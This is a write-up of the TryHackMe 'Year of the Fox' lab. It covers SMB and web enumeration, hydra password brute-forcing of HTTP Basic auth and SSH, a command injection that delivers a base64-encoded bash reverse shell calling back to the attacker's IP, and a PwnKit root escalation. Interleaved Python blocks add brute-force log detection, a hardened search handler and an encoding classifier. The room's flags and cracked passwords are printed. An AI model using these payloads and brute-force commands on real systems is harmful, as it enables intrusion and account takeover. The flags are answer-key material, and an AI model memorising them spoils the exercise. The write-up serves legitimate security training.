
Year of the Fox Write-up | TryHackMe Hard


Don’t underestimate the sly old fox…

TryHackMe/Year of the Fox


Enumeration

IP: 10.10.227.190

Threader3000 scan:

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.227.190
------------------------------------------------------------
Scanning target 10.10.227.190
Time started: 2022-07-12 22:12:46.963167
------------------------------------------------------------
Port 80 is open
Port 139 is open
Port 445 is open
Port scan completed in 0:00:59.895961
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p80,139,445 -sV -sC -T4 -Pn -oA 10.10.227.190 10.10.227.190

Running the suggested nmap scan:

nmap -p80,139,445 -sV -sC -T4 -Pn -oA 10.10.227.190 10.10.227.190
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 22:15 IST
Nmap scan report for 10.10.227.190
Host is up (0.18s latency).

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=You want in? Gotta guess the password!
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-07-12T16:45:20
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: year-of-the-fox
|   NetBIOS computer name: YEAR-OF-THE-FOX\x00
|   Domain name: lan
|   FQDN: year-of-the-fox.lan
|_  System time: 2022-07-12T17:45:20+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.00 seconds
------------------------------------------------------------
Combined scan completed in 0:02:39.259070

Hmm, the web page asks for HTTP Basic authentication:

Anyway, it runs Apache/2.4.29 (Ubuntu).

Anyway, we have an SMB share. :P

Listing its shares:

I can access IPC$ but not yotf, hmm.

enum4linux results:

enum4linux -a 10.10.227.190
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 12 22:25:25 2022

 =========================================( Target Information )=========================================

Target ........... 10.10.227.190
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.10.227.190 )===========================


[+] Got domain/workgroup name: YEAROFTHEFOX


 ===============================( Nbtstat Information for 10.10.227.190 )===============================

Looking up status of 10.10.227.190
	YEAR-OF-THE-FOX <00> -         B <ACTIVE>  Workstation Service
	YEAR-OF-THE-FOX <03> -         B <ACTIVE>  Messenger Service
	YEAR-OF-THE-FOX <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	YEAROFTHEFOX    <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	YEAROFTHEFOX    <1d> -         B <ACTIVE>  Master Browser
	YEAROFTHEFOX    <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 10.10.227.190 )===================================


[+] Server 10.10.227.190 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.227.190 )================================

Domain Name: YEAROFTHEFOX
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 10.10.227.190 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.227.190 from srvinfo: 
	YEAR-OF-THE-FOXWk Sv PrQ Unx NT SNT year-of-the-fox server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03


 =======================================( Users on 10.10.227.190 )=======================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: fox	Name: fox	Desc: 

user:[fox] rid:[0x3e8]

 =================================( Share Enumeration on 10.10.227.190 )=================================


	Sharename       Type      Comment
	---------       ----      -------
	yotf            Disk      Fox's Stuff -- keep out!
	IPC$            IPC       IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.227.190

//10.10.227.190/yotf	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.227.190/IPC$	Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 10.10.227.190 )===========================



[+] Attaching to 10.10.227.190 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] YEAR-OF-THE-FOX
	[+] Builtin

[+] Password Info for Domain: YEAR-OF-THE-FOX

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 ======================================( Groups on 10.10.227.190 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 10.10.227.190 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-21-978893743-2663913856-222388731 and logon username '', password ''

S-1-5-21-978893743-2663913856-222388731-501 YEAR-OF-THE-FOX\nobody (Local User)
S-1-5-21-978893743-2663913856-222388731-513 YEAR-OF-THE-FOX\None (Domain Group)

S-1-5-21-978893743-2663913856-222388731-1000 YEAR-OF-THE-FOX\fox (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)

 ===============================( Getting printer info for 10.10.227.190 )===============================

No printers returned.


enum4linux complete on Tue Jul 12 22:37:25 2022

So we have two users, fox and rascal. Checking for directories and files we can access:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.10.227.190/ -t 100 --no-error -b 401,403,404
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://10.10.227.190/ -t 100 --no-error -b 401,403,404

Mehh, nothing.

LASTTTTTTTT RESORRRRRTTTTTTTTTTTTTTTTTTTT

Brute-forcing HTTP Basic auth:

hydra -l admin -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64
hydra -l fox -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64
hydra -l rascal -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64 -v

Brute-forcing SMB:

hydra -l fox -P /usr/share/dict/rockyou.txt 10.10.227.190 smb

huhhh:

login: rascal password: bling
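HTTP Basic auth has no lockout by default, so a brute force like the one above only shows up for whoever reads the Apache access log: every guess is a 401, and Apache's %u field records the username the client sent in the Authorization header even when the answer was 401. The following is an added example, not part of the original write-up: it flags a client that piles up 401s in a short window and reports whether a 2xx from the same client follows (the guess that worked). The log lines are constructed for the example; only the rascal account and the attack-box address come from the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined log; %u holds the username sent in Authorization even on a 401.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a burst of guesses at "rascal" from the attack box used in
# this write-up, the guess that worked, and an unrelated single 401.
SAMPLE_LOG = """\
10.17.47.158 - rascal [12/Jul/2022:22:30:01 +0100] "GET / HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.17.47.158 - rascal [12/Jul/2022:22:30:01 +0100] "GET / HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.17.47.158 - rascal [12/Jul/2022:22:30:02 +0100] "GET / HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.17.47.158 - rascal [12/Jul/2022:22:30:02 +0100] "GET / HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.17.47.158 - rascal [12/Jul/2022:22:30:03 +0100] "GET / HTTP/1.1" 200 1543 "-" "Mozilla/4.0 (Hydra)"
10.0.0.7 - - [12/Jul/2022:22:31:10 +0100] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """One access-log line -> dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_basic_auth_bruteforce(lines, window_s=60, threshold=4):
    """Client IP -> {failures, users, succeeded_as} for clients with at least
    `threshold` 401s inside `window_s` seconds; succeeded_as is the %u of the
    first 2xx at or after the burst, i.e. the guess that got in."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec["ip"]].append(rec)
    hits = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r for r in recs if r["status"] == 401]
        for i, first in enumerate(fails):
            burst = [r for r in fails[i:]
                     if (r["ts"] - first["ts"]).total_seconds() <= window_s]
            if len(burst) >= threshold:
                after = [r for r in recs
                         if r["ts"] >= burst[-1]["ts"] and 200 <= r["status"] < 300]
                hits[ip] = {"failures": len(burst),
                            "users": sorted({r["user"] for r in burst}),
                            "succeeded_as": after[0]["user"] if after else None}
                break
    return hits
```

Run it against a real access log with `find_basic_auth_bruteforce(open("access.log"))`; a burst whose `succeeded_as` is set is the case worth a password reset.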

So now we get a web page, with the following results for a blank search:

Analysing the responses after capturing the request in Burp.

I guess it has some kind of filter:

Tried a random payload. :-; (error === progress) ???? The & symbol seems to be what causes the error. :P

Since it's not vulnerable to SQLi, it could be vulnerable to command injection.

After trying a bunch of payloads:

So we can execute whoami.

And the line ;-;

Using the following command to get a shell:

bash -i >& /dev/tcp/10.17.47.158/4242 0>&1

Hmm, let's try base64-encoding it and then piping it through base64 -d into bash. :)

Final payload:

{
	"target": "\"; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy40Ny4xNTgvNDI0MiAwPiYx | base64 -d | bash \n"
}

So we finally receive a shell.
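The payload works because the back end wraps the search term in double quotes inside a shell command and its filter only rejects `&`, so a value that closes the quote and appends `;` gets a command of its own. What follows is an added, hypothetical reconstruction of that handler for this write-up (not the room's source; the grep command and the /var/www/files path are assumptions): the blacklist version, a string check that shows a quote-breaking value slipping past it, and the hardened version that allowlists the value and never hands it to a shell.

```python
import json
import re
import subprocess

# Hypothetical reconstruction of the room's search endpoint, written for this
# write-up (not the room's source): the JSON "target" is spliced into a shell
# command inside double quotes and the only filter is a check for '&'.
SEARCH_DIR = "/var/www/files"          # assumed path
BLACKLIST = {"&"}
ALLOWED = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

# Constructed input in the shape of the write-up's payload: close the quote,
# chain a harmless command, end the line. Nothing in this file executes it.
PAGE_STYLE_PAYLOAD = '{"target": "\\"; whoami \\n"}'

def unsafe_command(body):
    """Vulnerable pattern: blacklist + concatenation, meant for /bin/sh -c.
    Returns the command string, or None when the blacklist rejects the input."""
    target = json.loads(body)["target"]
    if any(c in target for c in BLACKLIST):
        return None
    return 'grep -ri "' + target + '" ' + SEARCH_DIR

def escapes_quotes(cmd):
    """True when the spliced value broke out of its double-quoted argument:
    a ';', '|' or newline outside quotes, a second quoted region, or an
    unbalanced quote. Pure string analysis; nothing is executed."""
    in_quote, regions, stray = False, 0, False
    for ch in cmd:
        if ch == '"':
            regions += 0 if in_quote else 1
            in_quote = not in_quote
        elif ch in ";|\n" and not in_quote:
            stray = True
    return regions > 1 or stray or in_quote

def safe_argv(body):
    """Hardened version: allowlist the value and pass it as a single argv
    element. '--' stops grep from reading a leading '-' as an option."""
    target = json.loads(body)["target"]
    if not ALLOWED.fullmatch(target):
        raise ValueError("target rejected by allowlist")
    return ["grep", "-ri", "--", target, SEARCH_DIR]

def run_search(body):
    """Run the hardened command with shell=False so no shell parses the value."""
    proc = subprocess.run(safe_argv(body), capture_output=True, text=True, timeout=5)
    return proc.stdout
```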

Flag 1

THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}

Privilege Escalation - fox

creds2 contains something interesting; the other files are empty. It looks like base64 at first, but it isn't.

LF5GGMCNPJIXQWLKJEZFURCJGVMVOUJQJVLVE2CONVHGUTTKNBWVUV2WNNNFOSTLJVKFS6CNKRAX
UTT2MMZE4VCVGFMXUSLYLJCGGM22KRHGUTLNIZUE26S2NMFE6R2NGBHEIY32JVBUCZ2MKFXT2CQ=

Hmm, the server is also listening on port 22, but only locally (nmap didn't show it from outside). ;-;

Setting up a port forward:

./socat tcp-l:8080,fork,reuseaddr tcp:127.0.0.1:22 &

Hmm, so it's an SSH server. :P

Nothing seems to work. :-;

As I guess there's nothing left, having been stuck for quite a while and not having got a response on Discord for a hint: bruteforceeeeeeeeeeeeeeeeeeee.

hydra -l fox -P /usr/share/dict/rockyou.txt -s 8080 -f 10.10.227.190 ssh -t 64

huhhhh.

login: fox password: lovebug

;-; didn’t get anything for rascal.

Flag 2

THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}

Privilege Escalation - root

Again a lot of weird stuff; I don't even want to try anything, just straightttttttt up run LES (Linux Exploit Suggester) lmao.

creds1:

JV5GOMSOIRGTKTTKKV5E22SNGBGXUSL2JZCFS6SONJEXUTKUJU2E42SVGJHGUTLYJZVE2MSOIRGT
ETTKJV5E2RCNGVGXUVL2JZCE26KONJGXUT2UJV5E26SFPIFE46SZPBBWUTJTJZVFK6SNIRGTETTK
IV5E4RCNGRHGURL2JZCE26KONJKTETL2JV3U26TLPJHEIWLZJV5GOMSNKRMXQTL2JUZE4RCZPBGX
UY32JZKE252ONJIXUCSPKRGTCTL2KV5E4Z3PPJGWUTJVJV5EC6SNNJEXOTLKIF4VURCCNBBWOPJ5
BI======

cipher:

JV5FKMSNPJGTITTKKF5E46SZGJGXUVJSJZKFS6CONJCXUTTKJV4U26SBPJHUITJUJV5EC6SNPJMX
STL2MN5E6RCNGJGXUWJSJZCE2NKONJGTETLKLEZE26SBGIFE4VCZPBBWUTJUJZVEK6SNPJGXOTL2
IV5E6VCNGRHGURL2JVVFSMSNPJTTETTKJUYE26SRPJGWUTJSJZVE2MSNNJMTCTL2KUZE2VCNGBGX
USL2JZVE2M2ONJEXUCSNNJGTGTL2JEZE4ULPPJHVITLXJZVEK6SPIREXOTLKIF4VURCCNBBWOPJ5
BI======

Maybe I should shutdown this machine for good.
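creds2, creds1 and cipher share the tell-tales of base32 rather than base64: only A-Z and the digits 2-7, lengths that are multiples of 8, and up to six `=` of padding (base64 uses lower case, 0/1/8/9, `+` and `/`, and at most two `=`). The following is an added example, not part of the write-up: a small classifier that applies those rules and decodes accordingly. The creds2 blob is the one quoted above; the other sample strings are constructed, and a low printable ratio after decoding is the hint that another layer sits underneath.

```python
import base64
import binascii
import re

B64_ONLY = re.compile(r"[a-z0189+/]")             # characters base32 never uses
B32_ALPHABET = re.compile(r"^[A-Z2-7]+={0,6}$")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# creds2 as quoted in the write-up, joined into one string.
CREDS2 = ("LF5GGMCNPJIXQWLKJEZFURCJGVMVOUJQJVLVE2CONVHGUTTKNBWVUV2WNNNFOSTLJVKFS6CNKRAX"
          "UTT2MMZE4VCVGFMXUSLYLJCGGM22KRHGUTLNIZUE26S2NMFE6R2NGBHEIY32JVBUCZ2MKFXT2CQ=")

def classify_encoding(blob):
    """'base32', 'base64' or 'unknown' from alphabet, length and padding alone."""
    s = "".join(blob.split())
    if B64_ONLY.search(s):
        return "base64" if B64_ALPHABET.match(s) and len(s) % 4 == 0 else "unknown"
    if B32_ALPHABET.match(s) and len(s) % 8 == 0:
        return "base32"        # base64 could also fit, but this shape is base32's
    if B64_ALPHABET.match(s) and len(s) % 4 == 0:
        return "base64"
    return "unknown"

def decode_blob(blob):
    """Decode with whichever codec classify_encoding picked; None if neither fits."""
    s = "".join(blob.split())
    kind = classify_encoding(s)
    try:
        if kind == "base32":
            return base64.b32decode(s)
        if kind == "base64":
            return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None
    return None

def printable_ratio(data):
    """Share of bytes that are printable ASCII; a low value means the decoded
    bytes are not plain text, so the encoding was not the last layer."""
    return sum(32 <= b < 127 for b in data) / len(data) if data else 0.0
```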

Running LES:

./les.sh 

Available information:

Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

79 kernel space exploits
49 user space exploits

Possible Exploits:

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

Ehhh, PwnKit works again.

Now for the flag.

Flag 3

Hmm, hidden in /home/rascal:

THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk}

I kinda took a shortcut for the privilege escalation. :P You should check out the official write-up, as it's quite interesting: Official Writeup

This post is licensed under CC BY 4.0 by the author.